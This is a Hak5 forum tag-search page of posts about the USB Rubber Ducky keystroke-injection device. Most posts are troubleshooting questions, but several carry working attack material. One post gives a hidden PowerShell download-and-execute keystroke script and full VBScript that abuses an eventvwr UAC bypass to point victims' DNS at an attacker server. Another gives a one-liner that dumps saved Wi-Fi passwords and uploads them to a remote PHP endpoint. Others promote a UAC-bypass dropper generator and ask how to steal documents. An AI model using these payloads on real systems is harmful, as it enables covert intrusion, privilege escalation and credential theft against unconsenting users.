Jump to content

Search the Community

Showing results for tags 'DUCKY'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. Hello, I'm trying to compile custom firmware for a rubberducky, because I want to change the ducky's serialnumber. I've found the setting I want to change: \USB-Rubber-Ducky-master\Firmware\Source\Mass_Storage\USB\src\config\conf_usb.h > define USB_DEVICE_SERIAL_NAME "..." // Disk SN for MSC So now I just need to compile this into new working firmware. But I can't find a guide on doing this anywhere, and I haven't done much compiling/coding, so I don't have the experience to do it on my own. I've downloaded "Atmel Studio 7.0" since I read somewhere that that is what's needed, but after a lot of clicking arround and opening files and pressing buttons, I can't seem to get it to compile anything.. Can anyone help me with this? FYI: I've done my fair share of coding for arduino's/pi's and hardware hacking so I'm not a complete noob, but this has left me flustered a bit...
  2. The Wifi password grabber has been working great for the PC's ive used it on. Then i noticed something, On networks with two or more words in their SSID (etc; Park Home, Meme House or KFC Wifi) The Ducky will output : Network type: %B%, Authentication: %C%, Password: %D%, Instead of the normal Values. This only happens on networks with more than 2 words in their SSID. Any way to fix it? Link to the github with the wifi payload: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---WiFi-password-grabber
  3. Hello! I have run into a problem on the new 1.1 Firmware for the BashBunny! The problem is that I am not able to use a diffrent keymap than US, in this case SE. Before you sat the languages by QUACK SET_LANGUAGE se but know according to the new readme in the docs folder you set the languages by DUCKY_LANG=us. With and without QUACK in front of it I don't get it to work. I have copied all the .json languages files from ducky installer to the languages folder, maybe the problem is that I have not installed the languages files correctly. Help would be appreciated.
  4. So I have been working on a script (admittedly for a while, this is my first script) to grab wifi names and passwords off computers and dump them to a text files. So fair I have it working great, it grabs every wireless Internet connection that the computer has ever made and it dumps it straight back to usb within seconds, to grab and go. I just need help with one thing... How to hide the powershell window and is there anyway of making this script better (I already know i can use powershell to sent txt files to servers or through email i just think its easier with such a simple script to dump it straight back to usb)? Here is the Script
  5. Hey all, I'm interested in compiling Ducky Script to c++ that will run on an arduino. I would like to take ducky scripts such as the Wallpaper prank, and be able to easily put it on an arduino without having to modify any code myself. Why use an arduino? I have a lot of them, and I would like to take advantage of them. While I did manually write the code for the wallpaper prank in c++ last night, I would like the process to be streamlined by a compiler. I've done some research already and have tried out a few compilers that people have made, such as the Duckuino compiler, but the ones I've found are buggy and throw errors when the arduino IDE is compiling the c++ produced by the Ducky Script compiler. My question is, does anyone know of a working compiler that will take Ducky Script and push it to valid arduino code; or should I just fix the bugs in the Duckuino repo? Let me know if you need more info, or if I'm unclear anywhere. Thanks!
  6. Hey Rubber Ducky users! So I have recently purchased a Rubber Ducky and started scripting. I went ahead and got some scripts of the github repo and none of them worked properly. Then I went ahead to write the scripts myself starting with a simple Hello World working my way up. On the project of making a wallpaper prank script i noticed that some commands weren't working. The REPLAY command and the MENU/APP command are not executed. As this is a fresh Rubber Ducky, could this be a problem of firmware or could it be because I am using Windows 10? Or maybe a diffrent reason? Thanks in advance!
  7. The programming language, dubbed DuckyScript, is a simple instruction-based interface to creating a customized payload. However, it runs independently from the microcontroller that installs the drivers to the machine. On some older models running Windows XP, the device took upwards of 60 seconds to install the drivers. On newer machines running Windows 7, it took anywhere from 10-30. And if the drivers take longer to install than the delay you put at the beginning of your payload, it will begin firing off anyways. Source: https://thehacktoday.com/60-best-rubber-ducky-usb-payloads/
  8. I just got the usb rubber ducky in the mail and trying to flash twinduck, but cant get the usb rubber ducky in dfu mode ive tried everything, holding it before putting it in the laptop nothing is working, and seems like this forum is the only place to get support for this, unless someone knows how to get ahold of the people who makes it
  9. Hello all, i am new with rubber ducky, can anyone explain the below things to me so that i can get a clear image for it. can i use it as a usb mass storage device ? like it should show in PC that new mass storage device found and i can put files into it directly ( the mounted sdcard space) ? without remove sd card again and again ? will payloads wrok ? if i put files directly from PC into sdcard (without removing) using ducky usb port ? will ducky works (executes the commands / keyboards key ) while pluging into PC first time ? like as i feel like it does'nt work on first time it detects and install drivers and i have to re-plugin again to get it work. Thank you in advance, please explain a bit and suggest.
  10. Hello, it looks like i placed topic in wrong area so posting here in relative one ( as i thought i will not get reply on that post which is not related), sorry for that. i am new with rubber ducky, can anyone explain the below things to me so that i can get a clear image for it. can i use it as a usb mass storage device ? like it should show in PC that new mass storage device found and i can put files into it directly ( the mounted sdcard space) ? without remove sd card again and again ? will payloads wrok ? if i put files directly from PC into sdcard (without removing) using ducky usb port ? will ducky works (executes the commands / keyboards key ) while pluging into PC first time ? like as i feel like it does'nt work on first time it detects and install drivers and i have to re-plugin again to get it work. Thank you in advance, please explain a bit and suggest.
  11. Hi! I just got my new rubber ducky and I wanted to get the duck to look like "a real USB device" when you plug it in. I got my inspiration from the HAK5´s own video (https://www.youtube.com/watch?v=JON76zbiL1o). The thing that i dont seem to understand is how I "install" the code to my rubber ducky. I am looking at the page as we speak but I dont understand how I am supposed to do. Do I just move the " c_duck_v2.1.hex" file to the ducky disk or is it something that I am missing? Pls help me, I am new to this. Be kind in the comments pls
  12. Hi Guys, I'm pen-testing my fathers business network and I am using the Arduino Micro to input commands into the command Prompt. However when the Arduino try's to input an email address to email a log back to the 'hacker' the @ symbol in the Arduino script appears as an " in command Prompt??Any help is appreciated.Many ThanksCharlie
  13. This is a payload mainly based of the UAC bypassing download and execute payload generator i released not so long ago I strongly suggest you check that out first. https://www.youtube.com/watch?v=fmRRX7-G4lc https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky So the goal of this payload is to add a new primary "malicious" DNS server for all active networks devices on any windows computer, to do this we use the UAC bypass method used in the above payload , but in a different payload (also in the same "Visual basic " script format) The "gain" from this would be to surveillance DNS requests and/or setup phishing websites targeted/customized for those requests/victim. So for the ducky script we are going to be using the following code DELAY 1000 GUI r DELAY 100 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('[SOURCE]', '%temp%/[NAME]'); %temp%/[NAME] ENTER You wanna replace the "[NAME]" with a random name value ending in the .vbs extensions (Example: update.vbs) You wanna replace the [SOURCE] with the URL for the stager payload source(below) preferably hosted on paste-bin (Example: http://www.pastebin.com/raw/NEyDVtER ) <- /raw/ is IMPORTANT) Here is the .vbs payload. Dim objWMIService, objShell, colItems, objItem Set objShell = CreateObject("Wscript.Shell") Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapter WHERE NetConnectionStatus = 2") 'For each active network adapter For Each objItem in colItems 'Write UAC bypass regkey with the cmd command as value CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", "cmd /c netsh interface ipv4 set dns " + chr(34) + objItem.NetConnectionID + chr(34) + " static X.X.X.X primary" ,"REG_SZ" 'Trigger UAC bypass CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true 'Reset regkey GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\","" Next Here you wanna replace "X.X.X.X" with your malicious DNS server. If you need help setting up the DNS server you can have a look at this tutorial -> https://blog.heckel.xyz/2013/07/18/how-to-dns-spoofing-with-a-simple-dns-server-using-dnsmasq/ This again just show how fast,effective,invisible and powerless staged payloads for the rubber ducky is, especially with the UAC bypass integrated . Also, from what i can tell this bypasses all av's... Best Regards ~Skiddie
  14. Hi there, This simple script doesnt seem to work: DELAY 3000 GUI SPACE <-- This doesnt open the Spotlight search bar DELAY 500 STRING texteditor.app DELAY 500 ENTER DELAY 750 STRING Hello World!!! ENTER Any ideas? Thanks! :-)
  15. Hi all, I've created a ducky script which works fine when I execute the commands by hand, but fails after being encoded and run with the duck. The line in the code is: STRING $d=netsh wlan show profiles|sls -Pattern 'All User'|Foreach{$_.ToString()};$c=$d|Foreach{$_.Replace(' All User Profile : ',$null)};$z=ForEach($w in $c){netsh wlan show profiles $w key=clear};$p=$z|sls -Pattern 'SSID name','Key Content';(New-Object Net.WebClient).UploadString('http://IP_REMOVED/rx.php', $p) However the quote between -Pattern and All User is being dropped, as well as a single space from ' All User Profile'. Does anyone know why the encoding fails/does this? Bug in encoder? Cheers, Void
  16. Hey guys, just got my USB rubber Ducky today. I flashed the Twin Duck firmware and generatet a inject.bin. My Problem is that my Windows 7 Maschine always interrupt the Script by trying to open the inject.bin file. is there a Solution for that? P.S. sry if my english is bad ( Iam from Germany)
  17. So I just recently started a project very similar to @HaydenM's USB Rubber Ducky Toolkit. I wanted a cross-platform, lightweight emulator that I could easily push onto an otherwise clean target machine, and emulate my ducky script code without having to go through the monotonous process of encoding, transferring the encoded file, placing onto the Ducky, inserting onto the target machine, testing, and repeating. It has not been validated with all kinds of Ducky input, and has not been tested with other localization. It's built on Python3, and uses the PyAutoGUI library for its keystroke emulation. If anyone's interested, the code is at the following Github page: Source Code: https://github.com/terrabitz/QuackTest/ Executables: https://github.com/terrabitz/QuackTest/releases/tag/v0.1 I have precompiled some executables using PyInstaller. I have precompiled both the CLI and GUI for Linux and Windows. (I haven't gotten it made for Mac, simply because I don't have one to compile on; however, the code should be mostly cross-compatible). Please note, the Windows *win.exe files don't seem to work on all environments, primarily unpatched ones that don't have all the necessary C++ redistributable libraries. I haven't yet been able to figure out why this is, but even on these, the *win.zip versions seem to work OK. Here's what the GUI version looks like on Windows:
  18. Hi, I'm new to using the Rubber Ducky, and when i compile the script I wrote, this is the output I get: Hak5 Duck Encoder 2.6.4 Loading File ..... [ OK ] Loading Keyboard File ..... [ OK ] Loading Language File ..... [ OK ] Loading DuckyScript ..... [ OK ] Error on Line: 8 java.lang.NumberFormatException: For input string: "3500\" at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65) at java.lang.Integer.parseInt(Integer.java:580) at java.lang.Integer.parseInt(Integer.java:615) at Encoder.encodeToFile(Encoder.java:240) at Encoder.main(Encoder.java:134) Error on Line: 11 java.lang.NumberFormatException: For input string: "100\" at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65) at java.lang.Integer.parseInt(Integer.java:580) at java.lang.Integer.parseInt(Integer.java:615) at Encoder.encodeToFile(Encoder.java:240) at Encoder.main(Encoder.java:134) Error on Line: 13 java.lang.NumberFormatException: For input string: "100\" at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65) at java.lang.Integer.parseInt(Integer.java:580) at java.lang.Integer.parseInt(Integer.java:615) at Encoder.encodeToFile(Encoder.java:240) at Encoder.main(Encoder.java:134) Error on Line: 15 java.lang.NumberFormatException: For input string: "100\" at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65) at java.lang.Integer.parseInt(Integer.java:580) at java.lang.Integer.parseInt(Integer.java:615) at Encoder.encodeToFile(Encoder.java:240) at Encoder.main(Encoder.java:134) Error on Line: 17 java.lang.NumberFormatException: For input string: "3100\" at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65) at java.lang.Integer.parseInt(Integer.java:580) at java.lang.Integer.parseInt(Integer.java:615) at Encoder.encodeToFile(Encoder.java:240) at Encoder.main(Encoder.java:134) Error on Line: 19 java.lang.NumberFormatException: For input string: "100\" at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65) at java.lang.Integer.parseInt(Integer.java:580) at java.lang.Integer.parseInt(Integer.java:615) at Encoder.encodeToFile(Encoder.java:240) at Encoder.main(Encoder.java:134) Error on Line: 21 java.lang.NumberFormatException: For input string: "100\" at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65) at java.lang.Integer.parseInt(Integer.java:580) at java.lang.Integer.parseInt(Integer.java:615) at Encoder.encodeToFile(Encoder.java:240) at Encoder.main(Encoder.java:134) Error on Line: 23 java.lang.NumberFormatException: For input string: "100\" at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65) at java.lang.Integer.parseInt(Integer.java:580) at java.lang.Integer.parseInt(Integer.java:615) at Encoder.encodeToFile(Encoder.java:240) at Encoder.main(Encoder.java:134) DuckyScript Complete..... [ OK ] Here's the script itself, it's quite simple. REM this script is for OSX. DELAY 3500 GUI M GUI SPACE DELAY 100 STRING photo booth DELAY 100 ENTER DELAY 100 ENTER DELAY 3100 GUI SPACE DELAY 100 STRING terminal DELAY 100 STRING say you just got your picture taken DELAY 100 ENTER I am using OSX. When I compile the .txt file, it still saves as inject.bin. However, when I put the sd in the ducky and try to run it, nothing happens. I'm assuming it's because of the errors when I compile, so how would I fix these? Thank you in advance!
  19. Hey everyone, So I have been working on a project to accompany the USB rubber ducky. It's a toolkit has some nice features (imo of course ). Probably the its best feature is the Ducky Emulator, it can read a duckyscript txt file and emulate exactly what it would do (without the need of compiling to a bin, copying to sd card etc). Another feature is it's validator, which can look at DuckyScript and basically error check it like a IDE would. For example if you wrote DELAY hi It would say "DELAY must be followed by an integer". It has these kind of error checks for all valid functions in the DuckyScipt language. I'm a student currently in school full-time (CS of course), and I like open-source which is why I'm now posting this project here to see if anyone would be interested in contributing/helping. (The project is written in C# with .NET) Even if you are unable to help out with coding, things like beta-testing would also be much appreciated Overall, I'm looking to what everyone thinks about this! You can check out the project over on GitHub here: https://github.com/HaydenMeloche/USB-Rubber-Ducky-Toolkit -Hayden
  20. In Hak5's blog post about stealing files with the USB Rubber Ducky, they only targeted the documents folder on the C: drive. I'm looking to steal all .PDFs/Excel spreadsheet, regardless of their directory/drive. Can anyone show me how this is done? I have been trying all day now, but can't get a satisfactory result. Thanks in advance! Any help would be greatly appreciated.
  21. Hi, I have ran into a slight disadvantage of using twinduck firmware. Most Windows versions will auto mount and open the USB drive. This kind of messes with my delays and active windows, causing the duck to 'type' into an explorer window rather then the powershell or run prompt. Any way of disabling or delaying this Windows behaviour? Cheers, Void
  22. Hello Guys. I'm new in this community so nice to meet you! I'm very happy to write finally on this forum I've been reading for a while by now. I finally managed to built my Twin Ducky able to steal targeted files, following the lasts episodes of DK (2112-2113-2114) So of course I started enjoying to play with the parameters of e.cmd, and I was able to manage (unfortunately I have to admit, without any coding skills, don't get mad at me :P) to teach the rubber ducky not to steal just PDFs in the Documents folder but also to look for any pdf and doc file in all the folders belonging to %USERPROFILE% . Now, I wanted to go even further by making the process even faster. I thought the duration variable of the exfiltration process depends on the size of the pdf/doc/whatever document which we are trying to steal, and MAYBE we already know that the document we are looking for doesn't exceed a size of let's say 10-15 MB.. Wouldn't it be cool to write also a line to exclude those files? Wouldn't it be even faster? What do you think about this? Hope not to have written something stupid :S I'm not native English neither experienced in pentesting like you guys, so.. in that case forgive me. Let me know :) Have a nice day!
  23. Hi, i am trying to run different payloads on different keypresses(capslock, numlock); I would usually go for the Naked Duck way but I am trying to run different batch files depending on what key is pressed(and for that I need the mass storage to be loaded). Is there any way to combine these things? Or any way to run different batch files stored on the ducky at different keypresses?
  24. This is my official release of my UAC bypassing Rubber Ducky payload generator "UAC-DUCK". Download and execute any binary executable on any windows machine with UAC enabled as administrator WITHOUT prompting the user to elevate privileges . Its a 3 second download and execute with admin access. Generator written in Python so it's cross compatible with Windows and Linux. Github: https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky Full demo: http://sendvid.com/uh6i317i It uses a simple 2 stage process Stage 1: Stage one is the script that is triggered when the ducky is connected to any targeted windows machine. It will execute an powerful one-liner inside the "run" dialog of the system. The one liner is a simple powershell script, that when executes instantly hides then powershell windows and runs it the background. The powershell script downloads and execute our stage 2 .vbs payload in the %temp% directory Stage 2: Once your .vbs payload is on the system, we proceed to download our main binary payload. The .vbs script exploits a flaw in the windows registry system, this allows us to execute any binary file on the system with admin privilege without prompting the user for access (UAC). My Twitter: https://twitter.com/SkiddieTech
×
×
  • Create New...